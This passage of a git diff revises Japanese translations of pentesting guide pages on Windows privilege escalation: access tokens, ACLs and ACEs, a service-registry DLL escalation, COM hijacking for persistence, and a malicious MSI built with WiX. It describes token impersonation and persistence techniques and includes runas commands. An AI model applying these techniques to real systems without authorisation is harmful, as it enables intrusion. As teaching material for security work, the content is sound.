-[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- 設定ミスをチェックします（GitHubに事前コンパイル済みの実行可能ファイル）。推奨されません。Win10ではうまく動作しません。\
-[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- 可能な設定ミスをチェックします（Pythonからのexe）。推奨されません。Win10ではうまく動作しません。
+[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- PowerUpのC#への移植**\
+[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- 誤設定をチェックします（GitHubに事前コンパイル済みの実行可能ファイル）。推奨されません。Win10ではうまく動作しません。\
+[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- 可能な誤設定をチェックします（Pythonからのexe）。推奨されません。Win10ではうまく動作しません。
 
 **Bat**
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index fc5fcff43..565b788b9 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -4,7 +4,7 @@
 
 ## アクセストークン
 
-各**システムにログインしているユーザー**は、そのログオンセッションの**セキュリティ情報を持つアクセストークンを保持しています**。システムはユーザーがログインするときにアクセストークンを作成します。**ユーザーのために実行されるすべてのプロセス**は**アクセストークンのコピーを持っています**。トークンはユーザー、ユーザーのグループ、およびユーザーの特権を識別します。トークンには、現在のログオンセッションを識別するログオンSID（セキュリティ識別子）も含まれています。
+各**システムにログインしているユーザー**は、そのログオンセッションの**セキュリティ情報を持つアクセストークン**を保持しています。ユーザーがログインすると、システムはアクセストークンを作成します。**ユーザーのために実行されるすべてのプロセス**は**アクセストークンのコピーを持っています**。トークンはユーザー、ユーザーのグループ、およびユーザーの権限を識別します。トークンには、現在のログオンセッションを識別するログオンSID（セキュリティ識別子）も含まれています。
 
 この情報は`whoami /all`を実行することで確認できます。
 ```
@@ -50,27 +50,27 @@ SeUndockPrivilege             Remove computer from docking station Disabled
 SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
 SeTimeZonePrivilege           Change the time zone                 Disabled
 ```
-または、Sysinternalsの _Process Explorer_ を使用して（プロセスを選択し、「セキュリティ」タブにアクセス）：
+or using _Process Explorer_ from Sysinternals (select process and access"Security" tab):
 
 ![](<../../images/image (772).png>)
 
 ### ローカル管理者
 
-ローカル管理者がログインすると、**2つのアクセス トークンが作成されます**: 1つは管理者権限付き、もう1つは通常の権限付きです。**デフォルトでは**、このユーザーがプロセスを実行するとき、**通常の**（非管理者）**権限が使用されます**。このユーザーが**管理者として**何かを**実行**しようとすると（例えば「管理者として実行」）、**UAC**が許可を求めるために使用されます。\
-**UACについてさらに学びたい場合は、このページをお読みください** [**こちら**](../authentication-credentials-uac-and-efs/#uac)**。**
+ローカル管理者がログインすると、**2つのアクセス トークンが作成されます**: 1つは管理者権限を持ち、もう1つは通常の権限を持ちます。**デフォルトでは**、このユーザーがプロセスを実行するとき、**通常の**（非管理者）**権限のトークンが使用されます**。このユーザーが**管理者として**何かを**実行**しようとすると（たとえば「管理者として実行」）、**UAC**が許可を求めるために使用されます。\
+UACについて[**詳しく学ぶにはこのページを読んでください**](../authentication-credentials-uac-and-efs/#uac)**。**
 
 ### 資格情報のユーザーなりすまし
 
-他のユーザーの**有効な資格情報**がある場合、その資格情報を使用して**新しいログオン セッションを作成**できます：
+他のユーザーの**有効な資格情報**がある場合、その資格情報を使用して**新しいログオン セッションを作成**できます:
 ```
 runas /user:domain\username cmd.exe
 ```
 **アクセス トークン**には、**LSASS**内のログオン セッションの**参照**も含まれています。これは、プロセスがネットワークのいくつかのオブジェクトにアクセスする必要がある場合に便利です。\
-ネットワーク サービスにアクセスするために**異なる資格情報を使用する**プロセスを起動するには、次のようにします:
+ネットワーク サービスにアクセスするために**異なる資格情報を使用する**プロセスを起動するには、次のコマンドを使用します:
 ```
 runas /user:domain\username /netonly cmd.exe
 ```
-これは、ネットワーク内のオブジェクトにアクセスするための有用な資格情報を持っているが、その資格情報が現在のホスト内では無効である場合に役立ちます（現在のホストでは、現在のユーザー権限が使用されます）。
+これは、ネットワーク内のオブジェクトにアクセスするための有用な資格情報を持っているが、その資格情報が現在のホスト内では無効である場合に役立ちます（現在のホストでは現在のユーザー権限が使用されます）。
 
 ### トークンの種類
 
@@ -85,20 +85,20 @@ runas /user:domain\username /netonly cmd.exe
 
 #### インパーソネートトークン
 
-metasploitの_**incognito**_モジュールを使用すると、十分な権限があれば、他の**トークン**を簡単に**リスト**および**インパーソネート**できます。これは、**他のユーザーのように行動するため**に役立つ可能性があります。この技術を使用して**権限を昇格**させることもできます。
+metasploitの_**incognito**_モジュールを使用すると、十分な権限があれば他の**トークン**を簡単に**リスト**および**インパーソネート**できます。これは、**他のユーザーのように行動するために**役立つ可能性があります。この技術を使用して**権限を昇格**させることもできます。
 
-### トークンの権限
+### トークン権限
 
-**権限を昇格させるために悪用できるトークンの権限を学びましょう：**
+**権限を昇格させるために悪用できるトークン権限を学びましょう：**
 
 {{#ref}}
 privilege-escalation-abusing-tokens.md
 {{#endref}}
 
-[**すべての可能なトークンの権限とこの外部ページのいくつかの定義を確認してください**](https://github.com/gtworek/Priv2Admin)。
+[**すべての可能なトークン権限とこの外部ページのいくつかの定義を確認してください**](https://github.com/gtworek/Priv2Admin)。
 
 ## 参考文献
 
-トークンについての詳細は、次のチュートリアルを参照してください：[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) および [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
+このチュートリアルでトークンについてもっと学びましょう：[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) および [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index 9df724cf3..fbfe25e91 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -4,83 +4,83 @@
 
 ## **アクセス制御リスト (ACL)**
 
-アクセス制御リスト (ACL) は、オブジェクトとそのプロパティに対する保護を指示するアクセス制御エントリ (ACE) の順序付けられたセットで構成されています。要するに、ACL は特定のオブジェクトに対してどのセキュリティプリンシパル (ユーザーまたはグループ) のどのアクションが許可または拒否されるかを定義します。
+アクセス制御リスト (ACL) は、オブジェクトとそのプロパティに対する保護を指示するアクセス制御エントリ (ACE) の順序付けられたセットで構成されています。要するに、ACLは特定のオブジェクトに対してどのセキュリティプリンシパル（ユーザーまたはグループ）がどのアクションを許可または拒否されるかを定義します。
 
-ACL には 2 種類あります：
+ACLには2種類あります：
 
 - **裁量アクセス制御リスト (DACL):** どのユーザーとグループがオブジェクトにアクセスできるか、またはできないかを指定します。
 - **システムアクセス制御リスト (SACL):** オブジェクトへのアクセス試行の監査を管理します。
 
-ファイルにアクセスするプロセスでは、システムがオブジェクトのセキュリティ記述子をユーザーのアクセス トークンと照合して、アクセスが許可されるべきか、またそのアクセスの範囲を ACE に基づいて判断します。
+ファイルにアクセスするプロセスでは、システムがオブジェクトのセキュリティ記述子をユーザーのアクセス トークンと照合して、アクセスを許可すべきか、またその範囲をACEに基づいて判断します。
 
 ### **主要コンポーネント**
 
-- **DACL:** オブジェクトに対するユーザーとグループへのアクセス権を付与または拒否する ACE を含みます。基本的に、アクセス権を指示する主要な ACL です。
-- **SACL:** オブジェクトへのアクセスの監査に使用され、ACE はセキュリティイベントログに記録されるアクセスの種類を定義します。これは、不正アクセスの試行を検出したり、アクセスの問題をトラブルシューティングしたりするのに非常に役立ちます。
+- **DACL:** ユーザーとグループに対してオブジェクトへのアクセス権を付与または拒否するACEを含みます。基本的に、アクセス権を指示する主要なACLです。
+- **SACL:** オブジェクトへのアクセスの監査に使用され、ACEはセキュリティイベントログに記録されるアクセスの種類を定義します。これは、不正アクセスの試行を検出したり、アクセスの問題をトラブルシューティングしたりするのに非常に役立ちます。
 
-### **ACL とのシステムの相互作用**
+### **ACLとのシステムの相互作用**
 
-各ユーザー セッションは、そのセッションに関連するセキュリティ情報を含むアクセス トークンに関連付けられています。これには、ユーザー、グループの識別子、および特権が含まれます。このトークンには、セッションを一意に識別するログオン SID も含まれています。
+各ユーザーセッションは、そのセッションに関連するセキュリティ情報を含むアクセス トークンに関連付けられています。これには、ユーザー、グループの識別子、および特権が含まれます。このトークンには、セッションを一意に識別するログオンSIDも含まれています。
 
-ローカル セキュリティ機関 (LSASS) は、アクセスを試みるセキュリティプリンシパルに一致する ACE を DACL で調べることによって、オブジェクトへのアクセス要求を処理します。関連する ACE が見つからない場合、アクセスは即座に許可されます。それ以外の場合、LSASS はアクセス トークン内のセキュリティプリンシパルの SID と ACE を比較して、アクセスの適格性を判断します。
+ローカル セキュリティ機関 (LSASS) は、アクセスを試みるセキュリティプリンシパルに一致するACEをDACLで調べることによって、オブジェクトへのアクセス要求を処理します。関連するACEが見つからない場合、アクセスは即座に許可されます。それ以外の場合、LSASSはアクセス トークン内のセキュリティプリンシパルのSIDとACEを比較して、アクセスの適格性を判断します。
 
 ### **要約プロセス**
 
-- **ACL:** DACL を通じてアクセス権を定義し、SACL を通じて監査ルールを定義します。
+- **ACL:** DACLを通じてアクセス権を定義し、SACLを通じて監査ルールを定義します。
 - **アクセス トークン:** セッションのユーザー、グループ、および特権情報を含みます。
-- **アクセス決定:** DACL ACE とアクセス トークンを比較することによって行われます。SACL は監査に使用されます。
+- **アクセス決定:** DACL ACEとアクセス トークンを比較して行われます。SACLは監査に使用されます。
 
 ### ACEs
 
-**アクセス制御エントリ (ACE)** には **3 つの主要なタイプ** があります：
+**アクセス制御エントリ (ACE)** には **3つの主要なタイプ** があります：
 
-- **アクセス拒否 ACE:** この ACE は、指定されたユーザーまたはグループ (DACL 内) に対してオブジェクトへのアクセスを明示的に拒否します。
-- **アクセス許可 ACE:** この ACE は、指定されたユーザーまたはグループ (DACL 内) に対してオブジェクトへのアクセスを明示的に許可します。
-- **システム監査 ACE:** システムアクセス制御リスト (SACL) 内に配置され、この ACE はユーザーまたはグループによるオブジェクトへのアクセス試行時に監査ログを生成する役割を担います。アクセスが許可されたか拒否されたか、またその性質を記録します。
+- **アクセス拒否ACE:** 指定されたユーザーまたはグループに対してオブジェクトへのアクセスを明示的に拒否します（DACL内）。
+- **アクセス許可ACE:** 指定されたユーザーまたはグループに対してオブジェクトへのアクセスを明示的に許可します（DACL内）。
+- **システム監査ACE:** システムアクセス制御リスト (SACL) 内に位置し、ユーザーまたはグループによるオブジェクトへのアクセス試行時に監査ログを生成する役割を担います。アクセスが許可されたか拒否されたか、またその性質を記録します。
 
-各 ACE には **4 つの重要なコンポーネント** があります：
+各ACEには **4つの重要なコンポーネント** があります：
 
-1. ユーザーまたはグループの **セキュリティ識別子 (SID)** (またはグラフィカル表現におけるそのプリンシパル名)。
-2. ACE タイプを識別する **フラグ** (アクセス拒否、許可、またはシステム監査)。
-3. 子オブジェクトが親から ACE を継承できるかどうかを決定する **継承フラグ**。
-4. オブジェクトの付与された権利を指定する 32 ビット値の [**アクセス マスク**](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b?redirectedfrom=MSDN)。
+1. ユーザーまたはグループの **セキュリティ識別子 (SID)**（またはグラフィカル表現でのそのプリンシパル名）。
+2. ACEタイプを識別する **フラグ**（アクセス拒否、許可、またはシステム監査）。
+3. 子オブジェクトが親からACEを継承できるかどうかを決定する **継承フラグ**。
+4. オブジェクトの付与された権利を指定する **アクセス マスク**、32ビットの値。
 
-アクセスの決定は、次の条件が満たされるまで各 ACE を順次調べることによって行われます：
+アクセスの決定は、次の条件が満たされるまで各ACEを順次調べることによって行われます：
 
-- **アクセス拒否 ACE** が、アクセス トークン内の受託者に対して要求された権利を明示的に拒否します。
-- **アクセス許可 ACE** が、アクセス トークン内の受託者に対して要求されたすべての権利を明示的に付与します。
-- すべての ACE を確認した結果、要求された権利が **明示的に許可されていない**場合、アクセスは暗黙的に **拒否** されます。
+- **アクセス拒否ACE** がアクセス トークン内の受託者に対して要求された権利を明示的に拒否します。
+- **アクセス許可ACE** がアクセス トークン内の受託者に対して要求されたすべての権利を明示的に許可します。
+- すべてのACEを確認した結果、要求された権利が **明示的に許可されていない** 場合、アクセスは暗黙的に **拒否** されます。
 
-### ACE の順序
+### ACEの順序
 
-**ACEs** (誰が何にアクセスできるかを示すルール) が **DACL** と呼ばれるリストに配置される方法は非常に重要です。これは、システムがこれらのルールに基づいてアクセスを許可または拒否すると、残りのルールの確認を停止するためです。
+**ACEs**（誰が何にアクセスできるかを示すルール）が **DACL** と呼ばれるリストに配置される方法は非常に重要です。これは、システムがこれらのルールに基づいてアクセスを許可または拒否すると、残りのルールを調べるのをやめるからです。
 
-これらの ACE を整理する最良の方法は **「標準順序」** と呼ばれます。この方法は、すべてがスムーズかつ公正に機能することを保証します。以下は、**Windows 2000** および **Windows Server 2003** の場合の手順です：
+これらのACEを整理する最良の方法は **「標準順序」** と呼ばれます。この方法は、すべてがスムーズかつ公平に機能することを保証します。以下は、**Windows 2000** および **Windows Server 2003** のシステムにおける手順です：
 
-- 最初に、**このアイテムのために特に作成された**すべてのルールを、親フォルダーなどの他の場所からのルールの前に配置します。
-- その特定のルールの中で、**「いいえ」(拒否)** と言うルールを **「はい」(許可)** と言うルールの前に配置します。
-- 他の場所からのルールについては、**最も近いソース** (親) から始め、そこから遡っていきます。再度、**「いいえ」** を **「はい」** の前に配置します。
+- 最初に、**このアイテム専用** のルールを、親フォルダーなどの他の場所からのルールの前に配置します。
+- その特定のルールの中で、**「いいえ」（拒否）** と言うルールを **「はい」（許可）** と言うルールの前に配置します。
+- 他の場所からのルールについては、**最も近いソース**（親など）から始め、そこから遡ります。再度、**「いいえ」** を **「はい」** の前に配置します。
 
-この設定は、2 つの大きな利点があります：
+この設定は、2つの大きな利点があります：
 
-- 特定の **「いいえ」** がある場合、それが尊重されることを保証し、他の **「はい」** ルールがあっても影響を受けません。
-- アイテムの所有者が、親フォルダーやさらに遡ったルールが適用される前に、誰が入るかについて **最終的な決定権** を持つことができます。
+- 特定の **「いいえ」** がある場合、それが尊重され、他の **「はい」** ルールがあっても影響を受けません。
+- アイテムの所有者が、親フォルダーやさらに遡るルールが適用される前に、誰が入るかについて **最終的な決定権** を持つことができます。
 
-このようにすることで、ファイルやフォルダーの所有者は、誰がアクセスできるかを非常に正確に指定でき、正しい人が入れるようにし、間違った人が入れないようにします。
+この方法を採用することで、ファイルやフォルダーの所有者は、誰がアクセスできるかを非常に正確に指定でき、正しい人が入れるようにし、間違った人が入れないようにできます。
 
 ![](https://www.ntfs.com/images/screenshots/ACEs.gif)
 
 したがって、この **「標準順序」** は、アクセスルールが明確で効果的に機能することを保証し、特定のルールを最初に配置し、すべてを賢く整理することに関するものです。
 
-### GUI の例
+### GUIの例
 
 [**ここからの例**](https://secureidentity.se/acl-dacl-sacl-and-the-ace/)
 
-これは、ACL、DACL、および ACE を示すフォルダーのクラシックなセキュリティタブです：
+これは、ACL、DACL、およびACEを示すフォルダーのクラシックなセキュリティタブです：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/classicsectab.jpg](../../images/classicsectab.jpg)
 
-**詳細ボタン** をクリックすると、継承などの追加オプションが表示されます：
+**詳細ボタン**をクリックすると、継承などの追加オプションが表示されます：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/aceinheritance.jpg](../../images/aceinheritance.jpg)
 
@@ -88,60 +88,60 @@ ACL には 2 種類あります：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/editseprincipalpointers1.jpg](../../images/editseprincipalpointers1.jpg)
 
-最後に、監査タブに SACL があります：
+最後に、監査タブにSACLがあります：
 
 ![http://secureidentity.se/wp-content/uploads/2014/04/audit-tab.jpg](../../images/audit-tab.jpg)
 
-### アクセス制御の簡略化した説明
+### アクセス制御の簡略化された説明
 
-リソースへのアクセスを管理する際、フォルダーのように、アクセス制御リスト (ACL) およびアクセス制御エントリ (ACE) と呼ばれるリストとルールを使用します。これにより、誰が特定のデータにアクセスできるか、またはできないかが定義されます。
+リソースへのアクセスを管理する際、フォルダーのようなリソースに対して、アクセス制御リスト (ACL) およびアクセス制御エントリ (ACE) と呼ばれるリストとルールを使用します。これにより、誰が特定のデータにアクセスできるか、またはできないかを定義します。
 
 #### 特定のグループへのアクセス拒否
 
-「Cost」という名前のフォルダーがあり、マーケティングチームを除くすべての人がアクセスできるようにしたいとします。ルールを正しく設定することで、マーケティングチームが明示的にアクセスを拒否されることを保証し、他のすべての人にアクセスを許可できます。これは、マーケティングチームへのアクセスを拒否するルールを、他のすべての人へのアクセスを許可するルールの前に配置することで実現されます。
+「Cost」という名前のフォルダーがあり、マーケティングチームを除くすべての人がアクセスできるようにしたいとします。ルールを正しく設定することで、マーケティングチームが明示的にアクセスを拒否されることを保証し、他のすべての人にアクセスを許可することができます。これは、マーケティングチームへのアクセスを拒否するルールを、他のすべての人へのアクセスを許可するルールの前に配置することで実現されます。
 
 #### 拒否されたグループの特定のメンバーへのアクセス許可
 
-マーケティングディレクターのボブが、マーケティングチームが一般的にアクセスできない「Cost」フォルダーにアクセスする必要があるとします。ボブにアクセスを許可する特定のルール (ACE) を追加し、それをマーケティングチームへのアクセスを拒否するルールの前に配置できます。これにより、ボブはチームに対する一般的な制限にもかかわらずアクセスを得ることができます。
+マーケティングディレクターのボブが、マーケティングチームが一般的にアクセスできないにもかかわらず、Costフォルダーへのアクセスが必要だとしましょう。ボブにアクセスを許可する特定のルール (ACE) を追加し、それをマーケティングチームへのアクセスを拒否するルールの前に配置することができます。これにより、ボブはチームに対する一般的な制限にもかかわらずアクセスを得ることができます。
 
 #### アクセス制御エントリの理解
 
-ACE は ACL 内の個々のルールです。これらはユーザーまたはグループを特定し、許可または拒否されるアクセスを指定し、これらのルールがサブアイテムにどのように適用されるか (継承) を決定します。ACE には 2 つの主なタイプがあります：
+ACEはACL内の個々のルールです。これらはユーザーまたはグループを特定し、許可または拒否されるアクセスを指定し、これらのルールがサブアイテムにどのように適用されるか（継承）を決定します。ACEには2つの主要なタイプがあります：
 
-- **一般的な ACE:** これらは広く適用され、すべてのタイプのオブジェクトに影響を与えるか、コンテナ (フォルダー) と非コンテナ (ファイル) のみを区別します。たとえば、ユーザーがフォルダーの内容を表示できるが、その中のファイルにはアクセスできないというルールです。
-- **オブジェクト固有の ACE:** これらはより正確な制御を提供し、特定のタイプのオブジェクトやオブジェクト内の個々のプロパティに対してルールを設定できるようにします。たとえば、ユーザーのディレクトリ内で、ユーザーが自分の電話番号を更新できるが、ログイン時間は更新できないというルールがあります。
+- **一般的なACE:** これらは広く適用され、すべてのタイプのオブジェクトに影響を与えるか、コンテナ（フォルダーのような）と非コンテナ（ファイルのような）のみを区別します。たとえば、ユーザーがフォルダーの内容を表示できるが、その中のファイルにはアクセスできないというルールです。
+- **オブジェクト特定のACE:** これらはより正確な制御を提供し、特定のタイプのオブジェクトやオブジェクト内の個々のプロパティに対してルールを設定できるようにします。たとえば、ユーザーのディレクトリ内で、ユーザーが自分の電話番号を更新できるが、ログイン時間は更新できないというルールがあります。
 
-各 ACE には、ルールが適用される対象 (セキュリティ識別子または SID を使用)、ルールが許可または拒否する内容 (アクセス マスクを使用)、および他のオブジェクトによってどのように継承されるかに関する重要な情報が含まれています。
+各ACEには、ルールが適用される対象（セキュリティ識別子またはSIDを使用）、ルールが許可または拒否する内容（アクセス マスクを使用）、および他のオブジェクトによってどのように継承されるかに関する重要な情報が含まれています。
 
-#### ACE タイプ間の主な違い
+#### ACEタイプ間の主な違い
 
-- **一般的な ACE** は、オブジェクトのすべての側面またはコンテナ内のすべてのオブジェクトに同じルールが適用される単純なアクセス制御シナリオに適しています。
-- **オブジェクト固有の ACE** は、特に Active Directory のような環境で、オブジェクトの特定のプロパティへのアクセスを異なる方法で制御する必要がある場合に使用されます。
+- **一般的なACE** は、オブジェクトのすべての側面またはコンテナ内のすべてのオブジェクトに同じルールが適用される単純なアクセス制御シナリオに適しています。
+- **オブジェクト特定のACE** は、特にActive Directoryのような環境で、オブジェクトの特定のプロパティへのアクセスを異なる方法で制御する必要がある場合に使用されます。
 
-要約すると、ACL と ACE は正確なアクセス制御を定義するのに役立ち、適切な個人またはグループだけが機密情報やリソースにアクセスできるようにし、アクセス権を個々のプロパティやオブジェクトタイプのレベルまで調整できるようにします。
+要約すると、ACLとACEは正確なアクセス制御を定義するのに役立ち、適切な個人またはグループのみが機密情報やリソースにアクセスできるようにし、個々のプロパティやオブジェクトタイプのレベルまでアクセス権を調整できる能力を提供します。
 
 ### アクセス制御エントリのレイアウト
 
-| ACE フィールド | 説明                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
-| -------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| タイプ         | ACE のタイプを示すフラグ。Windows 2000 および Windows Server 2003 は、すべてのセキュアオブジェクトに付加される 3 つの一般的な ACE タイプと、Active Directory オブジェクトに発生する可能性のある 3 つのオブジェクト固有の ACE タイプをサポートしています。                                                                                                                                                                                                                          |
-| フラグ         | 継承と監査を制御するビットフラグのセット。                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
-| サイズ         | ACE に割り当てられたメモリのバイト数。                                                                                                                                                                                                                                                                                                                                                                                                                                                               |
-| アクセス マスク | オブジェクトのアクセス権に対応するビットを持つ 32 ビット値。ビットはオンまたはオフに設定できますが、設定の意味は ACE タイプによって異なります。たとえば、読み取り権限に対応するビットがオンになっていて、ACE タイプが拒否の場合、ACE はオブジェクトの権限を読み取る権利を拒否します。同じビットがオンになっていて、ACE タイプが許可の場合、ACE はオブジェクトの権限を読み取る権利を付与します。アクセス マスクの詳細は次の表に示されます。 |
-| SID            | この ACE によって制御または監視されるユーザーまたはグループを識別します。                                                                                                                                                                                                                                                                                                                                                                                                                                 |
+| ACEフィールド | 説明                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |
+| ------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| タイプ        | ACEのタイプを示すフラグ。Windows 2000およびWindows Server 2003は、すべてのセキュアオブジェクトに付随する3つの一般的なACEタイプと、Active Directoryオブジェクトに発生する可能性のある3つのオブジェクト特定のACEタイプをサポートしています。                                                                                                                                                                                                                                   |
+| フラグ        | 継承と監査を制御するビットフラグのセット。                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
+| サイズ        | ACEに割り当てられたメモリのバイト数。                                                                                                                                                                                                                                                                                                                                                                                                                                                               |
+| アクセス マスク | オブジェクトのアクセス権に対応するビットを持つ32ビットの値。ビットはオンまたはオフに設定できますが、設定の意味はACEタイプによって異なります。たとえば、読み取り権限に対応するビットがオンになっていて、ACEタイプが拒否の場合、ACEはオブジェクトの権限を読み取る権利を拒否します。同じビットがオンになっていて、ACEタイプが許可の場合、ACEはオブジェクトの権限を読み取る権利を付与します。アクセス マスクの詳細は次の表に示されます。 |
+| SID          | このACEによって制御または監視されるユーザーまたはグループを識別します。                                                                                                                                                                                                                                                                                                                                                                                                                                 |
 
-### アクセス マスクのレイアウト
+### アクセスマスクのレイアウト
 
-| ビット (範囲) | 意味                              | 説明/例                               |
-| ------------- | --------------------------------- | ------------------------------------- |
-| 0 - 15        | オブジェクト固有のアクセス権    | データの読み取り、実行、データの追加   |
-| 16 - 22       | 標準アクセス権                   | 削除、ACL の書き込み、所有者の書き込み |
-| 23            | セキュリティ ACL にアクセスできる |                                       |
-| 24 - 27       | 予約                             |                                       |
-| 28            | 一般的なすべて (読み取り、書き込み、実行) | すべての下位                          |
-| 29            | 一般的な実行                     | プログラムを実行するために必要なすべて |
-| 30            | 一般的な書き込み                 | ファイルに書き込むために必要なすべて   |
-| 31            | 一般的な読み取り                 | ファイルを読み取るために必要なすべて   |
+| ビット (範囲) | 意味                            | 説明/例                       |
+| ------------- | -------------------------------- | ----------------------------- |
+| 0 - 15        | オブジェクト特定のアクセス権      | データの読み取り、実行、データの追加 |
+| 16 - 22       | 標準アクセス権                   | 削除、ACLの書き込み、所有者の書き込み |
+| 23            | セキュリティACLにアクセスできる   |                               |
+| 24 - 27       | 予約                             |                               |
+| 28            | 一般的なすべて (読み取り、書き込み、実行) | すべての下位項目               |
+| 29            | 一般的な実行                     | プログラムを実行するために必要なすべてのもの |
+| 30            | 一般的な書き込み                 | ファイルに書き込むために必要なすべてのもの |
+| 31            | 一般的な読み取り                 | ファイルを読み取るために必要なすべてのもの |
 
 ## 参考文献
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index e30e692b5..da1e4a544 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -17,11 +17,11 @@
 
 これらの制限にもかかわらず、**RpcEptMapper**サービスのレジストリ構造内の**Performance**サブキーを利用することで特権昇格の可能性が特定されました。このサブキーはデフォルトでは存在しません。これにより、DLLの登録とパフォーマンス監視が可能になります。
 
-**Performance**サブキーに関する文書とそのパフォーマンス監視への利用が参照され、**OpenPerfData**、**CollectPerfData**、および**ClosePerfData**関数の実装を示す概念実証DLLが開発されました。このDLLは**rundll32**を介してテストされ、動作の成功が確認されました。
+**Performance**サブキーとそのパフォーマンス監視への利用に関する文書が参照され、概念実証DLLの開発が進められました。このDLLは、**OpenPerfData**、**CollectPerfData**、および**ClosePerfData**関数の実装を示し、**rundll32**を介してテストされ、その動作成功が確認されました。
 
 目標は、作成したPerformance DLLを**RPC Endpoint Mapper service**に読み込ませることでした。観察結果によると、PowerShellを介してパフォーマンスデータに関連するWMIクラスクエリを実行すると、ログファイルが作成され、**LOCAL SYSTEM**コンテキストで任意のコードを実行できるようになり、特権が昇格されました。
 
-この脆弱性の持続性と潜在的な影響が強調され、ポストエクスプロイト戦略、横移動、およびアンチウイルス/EDRシステムの回避における関連性が示されました。
+この脆弱性の持続性と潜在的な影響が強調され、ポストエクスプロイト戦略、横移動、およびウイルス対策/EDRシステムの回避における関連性が示されました。
 
 この脆弱性は、スクリプトを通じて意図せずに最初に開示されましたが、その悪用は古いWindowsバージョン（例：**Windows 7 / Server 2008 R2**）に制限され、ローカルアクセスが必要であることが強調されました。
 
diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
index 5e040b616..faac20e29 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -4,7 +4,7 @@
 
 ### 存在しないCOMコンポーネントの検索
 
-HKCUの値はユーザーによって変更できるため、**COM Hijacking**は**永続的なメカニズム**として使用される可能性があります。`procmon`を使用すると、攻撃者が永続化のために作成できる存在しないCOMレジストリを簡単に見つけることができます。フィルター：
+HKCUの値はユーザーによって変更可能であるため、**COM Hijacking**は**永続的なメカニズム**として使用される可能性があります。`procmon`を使用すると、攻撃者が永続化のために作成できる存在しないCOMレジストリを簡単に見つけることができます。フィルター：
 
 - **RegOpenKey**操作。
 - _Result_が**NAME NOT FOUND**であること。
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index 5e9e4ca64..0a183d821 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -6,7 +6,7 @@ MSIインストーラーの作成はwixtoolsを使用して行われ、特に[wi
 
 wix MSIの使用例を包括的に理解するためには、[このページ](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with)を参照することをお勧めします。ここでは、wix MSIの使用を示すさまざまな例を見つけることができます。
 
-目的は、lnkファイルを実行するMSIを生成することです。これを達成するために、以下のXMLコードを使用することができます（[xmlはこちらから](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)）：
+目的は、lnkファイルを実行するMSIを生成することです。これを達成するために、以下のXMLコードを使用することができます（[xml from here](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)）：
 ```markup
 <?xml version="1.0"?>
 <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
@@ -38,9 +38,9 @@ fail_here
 </Product>
 </Wix>
 ```
-Package要素には、InstallerVersionやCompressedなどの属性が含まれており、インストーラーのバージョンを指定し、パッケージが圧縮されているかどうかを示します。
